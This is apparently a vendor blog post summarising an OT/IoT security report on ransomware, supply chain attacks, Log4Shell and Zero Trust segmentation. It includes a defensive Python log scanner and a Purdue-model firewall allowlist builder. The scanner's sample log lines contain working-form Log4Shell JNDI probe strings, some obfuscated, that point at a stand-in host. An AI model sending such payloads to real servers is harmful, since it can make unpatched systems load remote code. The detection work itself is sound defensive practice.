New OT/IoT Security Report: Trends and Countermeasures for Critical Infrastructure Attacks


In our latest OT/IoT Security Report, Nozomi Networks Labs brings together an in-depth analysis of industry trends and our own security research findings.

The 2021 2H report is designed to help security teams and researchers protect their ICS and OT/IoT environments. It focuses on three main areas: trends in attacks, vulnerability research, and best practices in remediation efforts and technology.

We include a deeper dive into ransomware attacks over the past six months, and our own research into security camera and supply chain vulnerabilities. You’ll also learn more about remediation measures including attack surface reduction, the role of Zero Trust in modern OT/IoT networks, and techniques for analyzing device firmware for vulnerabilities.

Read on to learn about some of the highlights in our semi-annual report.

Supply Chain Attacks Offer the Greatest Opportunity to Spread Damage Quickly

Supply chain attacks have the potential to disrupt thousands of organizations at once: the blast radius depends on how broadly a common software component is used and on how easily the weakness can be exploited. The most widely reported supply chain attack to date occurred over a year ago, when trojanized SolarWinds Orion updates compromised dozens of critical network operations across industries and the federal government. Since then, attention to this area has grown, along with real vulnerabilities and exploits in open-source code.

When a vulnerability is announced in open-source software that many applications embed, the damage can be as extensive as, or more extensive than, a flaw in single-vendor software; it depends on how widely the library is used. This was the case with the December disclosure of the Log4Shell vulnerability (CVE-2021-44228). Log4Shell was found in the Apache Log4j (pronounced log-forge) open-source logging library, widely used in commercial applications and large online platforms. Because exploitation required only getting a crafted string into a field the application logs, attackers were able to launch attacks well ahead of remediation and patch efforts across the globe. One of the largest ransomware groups was able to use the exploit within a week, executing an attack against VMware vCenter deployments.
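One concrete check a security team could run while patching was under way: scan web-server or application logs for Log4Shell probes. The block below is an added example written for this article, not code from the report or from Nozomi Networks Labs. It detects the well-known `${jndi:` lookup pattern after undoing the common evasions seen in the wild (URL encoding, `${lower:…}`/`${upper:…}` case lookups, and `${…:-x}` default-value lookups). The log lines are constructed for the example; the IP addresses are documentation ranges. It is a triage aid, not a substitute for upgrading Log4j to a fixed release.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not from the report). The first three
# carry Log4Shell probes in the User-Agent or query string; the last two are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:14:03:40 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '10.0.0.7 - - [10/Dec/2021:14:04:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%2Fc%7D"',
    '10.0.0.8 - - [10/Dec/2021:14:05:13 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:06:21 +0000] "POST /api HTTP/1.1" 200 512 "-" "python-requests/2.25"',
]

_URL_ENCODED = re.compile(r"%[0-9A-Fa-f]{2}")
# ${lower:X} / ${upper:X} evaluate to X in the requested case inside Log4j.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
# ${name:-X} (including the degenerate ${::-X}) evaluates to the default value X.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The pattern we are ultimately looking for, with the JNDI scheme captured.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text, max_rounds=5):
    """Undo URL encoding and innermost Log4j lookups until the text stops changing.

    max_rounds bounds the work so a pathological line cannot stall the scanner.
    """
    for _ in range(max_rounds):
        before = text
        if _URL_ENCODED.search(text):
            text = urllib.parse.unquote(text)
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def scan_log_lines(lines):
    """Return one finding per line that contains a (de-obfuscated) JNDI lookup."""
    findings = []
    for lineno, raw in enumerate(lines, start=1):
        norm = normalize(raw)
        match = _JNDI.search(norm)
        if match:
            findings.append(
                {"line": lineno, "scheme": match.group(1).lower(), "normalized": norm}
            )
    return findings


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: jndi scheme={hit['scheme']}")
```

A detection like this confirms that a host was probed, not that it was exploited; a hit on a line should trigger a check of which services on that host log the offending field and whether they run a vulnerable Log4j.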

Our research on Log4j is a key focus area in the latest OT/IoT Security Report, along with other notable ransomware and supply chain attacks that occurred in 2021 2H.

Ransomware and supply chain attacks dominated the headlines in 2021 2H.

Nozomi Networks Labs’ Vulnerability Research Focuses on OT/IoT Devices and Networks

OT and IoT devices are the primary research area for Nozomi Networks Labs. In the last several years, IoT devices have become a common entry point to the entire network, and they are often overlooked compared to widely deployed IT platforms and operating systems. IoT devices often run stripped-down operating systems with security features removed due to power and cost constraints. OT systems such as SCADA and ICS equipment could once rely on an air gap separating them from Wi-Fi, the internet, and the larger IT and cloud networks; that is no longer the case. Security defenses need to be shored up accordingly.

Our OT/IoT Security report highlights some of our key research areas, including vulnerabilities within supply chains, cloud platforms, and specific enterprise software platforms. In addition to reviewing some of the most impactful vulnerability disclosures made by the Labs team over the second half of 2021, we cover research regarding the attack surface of surveillance systems, and what asset owners should keep in mind before deploying them within a network.

Best Practices Against Today’s Emerging Threats

Shoring up cyber defenses in OT and IoT environments requires a multi-pronged approach that often includes complementary technologies, well-defined oversight and processes, and necessary security hygiene. Too often, overburdened security teams allow human error to compromise even the most advanced defenses with weak passwords, misconfigured networks and devices, or social engineering. Many ransomware attacks begin with a naïve user clicking on a malicious email link in an otherwise well-defended network.

Network segmentation is another fundamental component of a cyber defense strategy designed to prevent the spread of malware to critical applications and OT processes. Several technologies are useful to segment networks, such as VLANs and firewalls, depending on the environment and policy requirements. In OT networks, the Purdue Model is one way of creating network zones that align with process elements and system function. However, too often we encounter organizations with completely flat networks (minimal segmentation), where easily compromised systems sit alongside mission-critical applications and processes with little or no isolation between them.

We make suggestions for increasing network segmentation in the OT/IoT Security Report, all the way to a Zero Trust model. At the network layer, Zero Trust is typically implemented as micro-segmentation: all connectivity between individual endpoints is denied except those connections which are explicitly allowed. In migrating to a Zero Trust model, it is important to monitor traffic patterns first. This allows you to understand how legitimate traffic flows through the organization before specifying the explicitly authorized connections, so that enforcement does not disrupt the process.
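The two steps described above, zoning hosts by Purdue level and baselining observed flows before switching to an explicit allowlist, can be put together in a small policy-building routine. The block below is an added example written for this article, not code or tooling from the report or from Nozomi Networks. The asset inventory, Purdue level assignments, and flow records are all constructed; addresses and ports are illustrative. The one design point worth noting is that a baseline should not simply enshrine everything it sees: a flow that already skips a Purdue level (here, an enterprise host talking directly to a PLC) is rejected from the allowlist rather than carried into the Zero Trust policy.

```python
from collections import namedtuple

Flow = namedtuple("Flow", "src dst proto dport")

# Constructed asset inventory: host -> Purdue level (hypothetical addresses).
PURDUE_LEVEL = {
    "10.10.4.20": 4,  # enterprise ERP server
    "10.10.3.15": 3,  # site operations jump host
    "10.10.2.10": 2,  # HMI / SCADA server
    "10.10.1.5": 1,   # PLC
    "10.10.1.6": 1,   # PLC
}

# Constructed flows observed during the monitoring (baselining) window.
BASELINE_FLOWS = [
    Flow("10.10.2.10", "10.10.1.5", "tcp", 502),    # HMI polls PLC over Modbus/TCP
    Flow("10.10.2.10", "10.10.1.6", "tcp", 502),
    Flow("10.10.3.15", "10.10.2.10", "tcp", 3389),  # operator RDP from the jump host
    Flow("10.10.4.20", "10.10.3.15", "tcp", 1433),  # ERP reads the site historian
    Flow("10.10.4.20", "10.10.1.6", "tcp", 502),    # enterprise host straight to a PLC
]

# Constructed flows seen once the allowlist is enforced.
NEW_FLOWS = [
    Flow("10.10.2.10", "10.10.1.5", "tcp", 502),    # known-good, in baseline
    Flow("10.10.4.20", "10.10.1.5", "tcp", 502),    # level 4 -> level 1, never baselined
    Flow("10.10.2.10", "10.10.1.6", "tcp", 44818),  # known pair, new protocol (EtherNet/IP)
]


def crosses_levels(flow, inventory):
    """True if the flow joins non-adjacent Purdue levels or an un-inventoried host."""
    a, b = inventory.get(flow.src), inventory.get(flow.dst)
    if a is None or b is None:
        return True  # unknown asset: treat as a violation until it is inventoried
    return abs(a - b) > 1


def build_allowlist(flows, inventory):
    """Default-deny baseline: keep observed tuples that respect the zone model.

    Returns (allowlist, rejected) so the rejected flows can be reviewed
    rather than silently carried into the policy.
    """
    allowed = frozenset(f for f in flows if not crosses_levels(f, inventory))
    rejected = [f for f in flows if f not in allowed]
    return allowed, rejected


def evaluate(flows, allowlist, inventory):
    """Decide allow/deny per flow and record every reason for a deny."""
    verdicts = []
    for f in flows:
        reasons = []
        if f not in allowlist:
            reasons.append("not in baseline allowlist")
        if crosses_levels(f, inventory):
            reasons.append("skips a Purdue level")
        verdicts.append((f, "deny" if reasons else "allow", reasons))
    return verdicts


def to_rules(allowlist):
    """Render the allowlist as ordered firewall-style rules ending in default deny."""
    rules = [
        f"allow {f.proto} from {f.src} to {f.dst} port {f.dport}"
        for f in sorted(allowlist)
    ]
    rules.append("deny any from any to any")
    return rules


if __name__ == "__main__":
    allowlist, rejected = build_allowlist(BASELINE_FLOWS, PURDUE_LEVEL)
    for f in rejected:
        print("rejected from baseline:", f)
    for rule in to_rules(allowlist):
        print(rule)
    for f, verdict, reasons in evaluate(NEW_FLOWS, allowlist, PURDUE_LEVEL):
        print(verdict, f, "; ".join(reasons))
```

In practice the baseline window has to span the full process cycle (shift changes, batch runs, maintenance windows), otherwise legitimate but infrequent flows show up as denies only after enforcement begins.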

We further discuss the importance of monitoring traffic to detect potential security threats, breaches and other anomalies in both network flows and OT processes. Finally, we cover attack surface reduction and what can be effectively achieved with reasonable effort.

Key Takeaways from the OT/IoT Security Report 2H 2021

By providing insights into key areas of the threat and vulnerability landscape, this security report aims to help organizations assess and enhance their security posture. We encourage companies to move forward by improving OT/IoT visibility, security, and monitoring. With the sophistication and ruthlessness of today’s adversaries, it is also important to adopt a post-breach mindset. Continuous advancement of your IT/OT security posture is the best way to ensure the availability, safety, and confidentiality of your operational systems.